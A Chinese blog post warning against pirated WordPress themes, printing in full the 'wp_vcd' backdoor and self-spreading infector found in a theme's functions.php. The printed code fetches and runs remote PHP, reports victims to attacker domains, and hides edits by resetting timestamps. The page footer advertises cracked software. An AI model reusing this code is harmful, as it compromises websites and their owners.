使用WordPress等系统盗版主题很可怕!

admin

发表文章数:3048

使用WordPress等系统盗版主题很可怕!

本站5天前放出了一个emlog博客系统的盗版fee主题的网站数据

今天给大家分享一篇国外的WordPress盗版主题的文章

主题森林相信国内WordPress用户都很熟习,来自该网站的收费主题在国内盗版横行,一些无良者对主题进行所谓优化、汉化后直接出售,更有甚者居然还有冒充国内代理的。主题森林大部分主题并不像国内主题需要加密绑域名或远程验证防盗版(因为国外用盗版是犯罪行为根本不需要这个),并且在主题森林购买主题后可以退款,因为主题并没有任何防范措施,主题森林并不会收回你已获得的主题包,你可以完全正常使用。什么时候国内能有这让我们大中华人民不可理解的商业行为,相信国内会有更多优秀的 WordPress 主题出现。

这里转篇应该是来自孟加拉的一个WordPresse 用户,下载并使用盗版WordPresse主题的可怕经历。

盗版主题非常恐怖!

笔者为了测试兼容性,谷歌上搜索并在一个专门提供盗版主题下载的网站,下载了一款来自Theme Forest(主题森林)的高级收费主题,笔者虽然也感觉有些可疑但并没多想,直接在本地环境中安装并启用。

笔者本身有一定的技术,也怕主题中捆绑恶意代码,还特意查看一下主题函数模板functions.php中有无可疑代码,但并未发现可疑的东西,于是勇敢地激活启用主题,还有些小鸡冻!

当完成测试切换到WP默认主题后,Query Monitor 监视器插件发出警告。

于是笔者打开当前主题的functions.php发现如下代码:

  1. <?php
  2. if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '35c977caf96f9197995d4b4d3e14f253')) {
  3. $div_code_name = "wp_vcd";
  4. switch ($_REQUEST['action']) {
  5. case 'change_domain';
  6. if (isset($_REQUEST['newdomain'])) {
  7. if (!empty($_REQUEST['newdomain'])) {
  8. if ($file = @file_get_contents(__FILE__)) {
  9. if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
  10. $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
  11. @file_put_contents(__FILE__, $file);
  12. print "true";
  13. }
  14. }
  15. }
  16. }
  17. break;
  18. case 'change_code';
  19. if (isset($_REQUEST['newcode'])) {
  20. if (!empty($_REQUEST['newcode'])) {
  21. if ($file = @file_get_contents(__FILE__)) {
  22. if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
  23. $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']) , $file);
  24. @file_put_contents(__FILE__, $file);
  25. print "true";
  26. }
  27. }
  28. }
  29. }
  30. break;
  31. default:
  32. print "ERROR_WP_ACTION WP_V_CD WP_CD";
  33. }
  34. die("");
  35. }
  36. $div_code_name = "wp_vcd";
  37. $funcfile = __FILE__;
  38. if (!function_exists('theme_temp_setup')) {
  39. $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
  40. if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
  41. function file_get_contents_tcurl($url)
  42. {
  43. $ch = curl_init();
  44. curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
  45. curl_setopt($ch, CURLOPT_HEADER, 0);
  46. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  47. curl_setopt($ch, CURLOPT_URL, $url);
  48. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  49. $data = curl_exec($ch);
  50. curl_close($ch);
  51. return $data;
  52. }
  53. function theme_temp_setup($phpCode)
  54. {
  55. $tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup");
  56. $handle = fopen($tmpfname, "w+");
  57. if (fwrite($handle, "<?php\n" . $phpCode)) {
  58. }
  59. else {
  60. $tmpfname = tempnam('./', "theme_temp_setup");
  61. $handle = fopen($tmpfname, "w+");
  62. fwrite($handle, "<?php\n" . $phpCode);
  63. }
  64. fclose($handle);
  65. include $tmpfname;
  66. unlink($tmpfname);
  67. return get_defined_vars();
  68. }
  69. $wp_auth_key = '358d76c863c31b2e1a46192808b08590';
  70. if (($tmpcontent = @file_get_contents("http://www.marors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.marors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
  71. if (stripos($tmpcontent, $wp_auth_key) !== false) {
  72. extract(theme_temp_setup($tmpcontent));
  73. @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
  74. if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
  75. @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
  76. if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
  77. @file_put_contents('wp-tmp.php', $tmpcontent);
  78. }
  79. }
  80. }
  81. }
  82. elseif ($tmpcontent = @file_get_contents("http://www.marors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
  83. if (stripos($tmpcontent, $wp_auth_key) !== false) {
  84. extract(theme_temp_setup($tmpcontent));
  85. @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
  86. if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
  87. @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
  88. if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
  89. @file_put_contents('wp-tmp.php', $tmpcontent);
  90. }
  91. }
  92. }
  93. }
  94. elseif ($tmpcontent = @file_get_contents("http://www.marors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
  95. if (stripos($tmpcontent, $wp_auth_key) !== false) {
  96. extract(theme_temp_setup($tmpcontent));
  97. @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
  98. if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
  99. @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
  100. if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
  101. @file_put_contents('wp-tmp.php', $tmpcontent);
  102. }
  103. }
  104. }
  105. }
  106. elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
  107. extract(theme_temp_setup($tmpcontent));
  108. }
  109. elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
  110. extract(theme_temp_setup($tmpcontent));
  111. }
  112. elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
  113. extract(theme_temp_setup($tmpcontent));
  114. }
  115. }
  116. }
  117. // $start_wp_theme_tmp
  118. // wp_tmp
  119. // $end_wp_theme_tmp
  120. ?>

通过这些代码,攻击者可以按自己的意愿在主题或服务器中推送任何代码。笔者庆幸自己没有在主机环境中安装这个主题,否则不知道会发生什么!但当前使用的这个并不是之前下载的那个盗版主题,经查看,所有WordPress本地环境中的主题的functions.php文件都被这个代码感染了,这太可怕了 !

删除这些代码后,Query Monitor 监视器插件仍然报告相同的错误,那怎么可能呢 ?再次打开文件,令人惊讶的是,代码又出现了!最终判定在向主题中注入代码的同时,它肯定还做了一些其他的事情。需要检查WordPress核心文件,经查创建了两个新文件并修改了一个核心文件包括文件夹。其中一个文件名称:wp-vcd.php,代码如下:

  1. <?php
  2. error_reporting(0);
  3. // gICAgICAgICAgICA
  4. ini_set('display_errors', 0);
  5. // 2V0KCRfUkVRVUVTVFsn
  6. $install_code = 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiopXC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQkJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwokZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV90ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgICAgICAKICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogICAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKICAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgICAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICAgICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJHRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgICAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hbWUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH0KICAgICAgICAKCiR3cF9hdXRoX2tleT0nMzU4ZDc2Yzg2M2MzMWIyZTFhNDYxOTI4MDhiMDg1OTAnOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cubWFyb3JzLmNvbS9jb2RlLnBocCIpIE9SICR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzX3RjdXJsKCJodHRwOi8vd3d3Lm1hcm9ycy5jb20vY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CgogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy5tYXJvcnMucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cubWFyb3JzLnRvcC9jb2RlLnBocCIpICBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UgKSB7CgppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CgkJZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICB9Cn0KCi8vJHN0YXJ0X3dwX3RoZW1lX3RtcAoKCgovL3dwX3RtcAoKCi8vJGVuZF93cF90aGVtZV90bXAKPz4=';
  7. $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
  8. $install_code = str_replace('{$PASSWORD}', $install_hash, base64_decode($install_code));
  9. $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
  10. $ping = true;
  11. $ping2 = false;
  12. if ($list = scandir($themes)) {
  13. foreach($list as $_) {
  14. if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
  15. $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
  16. if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
  17. if (strpos($content, 'WP_V_CD') === false) {
  18. $content = $install_code . $content;
  19. @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
  20. touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $time);
  21. }
  22. else {
  23. $ping = false;
  24. }
  25. }
  26. }
  27. else {
  28. $list2 = scandir($themes . DIRECTORY_SEPARATOR . $_);
  29. foreach($list2 as $_2) {
  30. if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
  31. $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
  32. if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
  33. if (strpos($content, 'WP_V_CD') === false) {
  34. $content = $install_code . $content;
  35. @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
  36. touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $time);
  37. $ping2 = true;
  38. }
  39. else {
  40. // $ping = false;
  41. }
  42. }
  43. }
  44. }
  45. }
  46. }
  47. if ($ping) {
  48. $content = @file_get_contents('http://www.marors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
  49. // @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.marors.com/admin.txt'));
  50. }
  51. if ($ping2) {
  52. $content = @file_get_contents('http://www.marors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
  53. // @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.marors.com/admin.txt'));
  54. // echo ABSPATH . 'wp-includes/class.wp.php';
  55. }
  56. }
  57. ?><?php
  58. error_reporting(0); ?>

最后想说的

1.盗版主题大部分都包含木马及后门程序,辛苦建好的网站谁也不想付诸东流,为了爱站,拒绝盗版。

2.盗版主题多为陈旧老版本,漏洞多,bug多,使用起来问题百出,免费的未必是最好的,为了效率,拒绝盗版。

3.盗版主题均无售后服务支持,出问题只能自己解决,正版用户均可享受售后服务,技术支持,并永久跟随官方升级更新,为了服务,拒绝盗版。

请不要在自己的网站上使用任何盗版主题和插件,不要相信这些插件或提供盗版主题的网站,否则将使你的宝贵数据丢失或者被黑客攻击。


请不要尝试将上面的代码复制到主题中,后果自负。

很多年前,我也喜欢尝试安装各种主题和插件,也遇到过类似的事情况,这里奉劝大家小心为上!

未经允许不得转载:作者:admin, 转载或复制请以 超链接形式 并注明出处 夜河资源网
原文地址:《使用WordPress等系统盗版主题很可怕!》 发布于2020-03-21

分享到:
赞(0) 打赏

评论 抢沙发

2 + 2 =


撰写不易~如果您觉得文章对您有帮助的话可以打赏我哦~谢谢亲亲~

支付宝扫一扫打赏

微信扫一扫打赏

外服网游加速器破解版
包含腾讯网游加速器、海豚网游加速器等八款知名加速器,可加速外服游戏,永久包售后包更新,不定时添加新款破解版加速器!
切换注册

登录

忘记密码 ?

切换登录

注册